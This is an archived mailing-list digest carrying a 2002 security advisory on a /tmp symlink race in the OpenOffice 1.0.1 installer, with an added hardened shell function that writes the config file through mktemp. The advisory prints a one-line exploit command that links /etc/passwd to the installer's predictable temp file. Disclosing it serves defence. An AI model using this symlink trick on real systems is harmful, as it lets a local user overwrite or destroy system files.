[Vulnerable for a short while when OpenOffice is installing. Please
follow the advice in the mail if you're paranoid -- Raju]
This is an RFC 1153 digest.
(1 message)
----------------------------------------------------------------------
Message-ID: <[EMAIL PROTECTED]>
From: "Larry W. Cashdollar" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Subject: OpenOffice 1.0.1 Race condition during installation.
Date: Fri, 11 Oct 2002 09:51:22 -0400 (EDT)
Vapid Labs
Larry W. Cashdollar
9/9/02
Summary: OpenOffice 1.0.1 Race condition during installation can overwrite
system files.
Severity: Low
Description: A very simple and easy to exploit race condition exists during the
installation of OpenOffice. During this window a malicious user could create a
symlink in /tmp and overwrite arbitrary files.
Exploit:
As a normal user:
lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf
Where $USERNAME is the installer account name, probably root.
This will result in the password file being overwritten with:
# create the proper autoresponse file
cat << EOF > /tmp/${USER}_autoresponse.conf
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo_home
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>
[JAVA]
JavaSupport=preinstalled_or_none
EOF
Fix:
Create a directory under /tmp to work from, with restrictive permissions.
References:
http://www.openoffice.org/dev_docs/source/1.0.1/index.html
Larry W. Cashdollar
[EMAIL PROTECTED]
http://vapid.ath.cx
------------------------------
End of this Digest
******************
--
Raju Mathur [EMAIL PROTECTED] http://kandalaya.org/
It is the mind that moves
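
Added example (not part of the original advisory or of the OpenOffice installer): one way to apply the fix described under "Fix:", writing the autoresponse file inside a private mktemp directory instead of the predictable /tmp/${USER}_autoresponse.conf. The function name write_autoresponse, the oo_install prefix and the argument values are assumptions made for illustration.

```shell
#!/bin/sh
# Hardened form of the installer's autoresponse write (added example).
# Hypothetical helper: $1 = install type, $2 = destination path.
# Prints the path of the file it created; returns non-zero on failure.
write_autoresponse() {
    installtype=$1
    destpath=$2
    (
        # Owner-only permissions for everything created below.
        umask 077
        # mktemp -d creates the directory atomically, mode 0700, with an
        # unpredictable name, and fails instead of reusing an existing
        # entry, so a symlink planted in advance is never followed.
        workdir=$(mktemp -d "${TMPDIR:-/tmp}/oo_install.XXXXXX") || exit 1
        conf="$workdir/autoresponse.conf"
        # Defence in depth: with noclobber, '>' refuses to write through
        # any file or symlink that already exists at the target path.
        set -C
        cat > "$conf" << EOF || exit 1
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$destpath
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>
[JAVA]
JavaSupport=preinstalled_or_none
EOF
        printf '%s\n' "$conf"
    )
}

# Usage (constructed values):
#   conf=$(write_autoresponse EXAMPLE_MODE /opt/example) || exit 1
#   ... run the setup program against "$conf" ...
#   rm -rf "$(dirname "$conf")"
```

Because the subshell scopes the umask and noclobber changes, the rest of the calling script is unaffected.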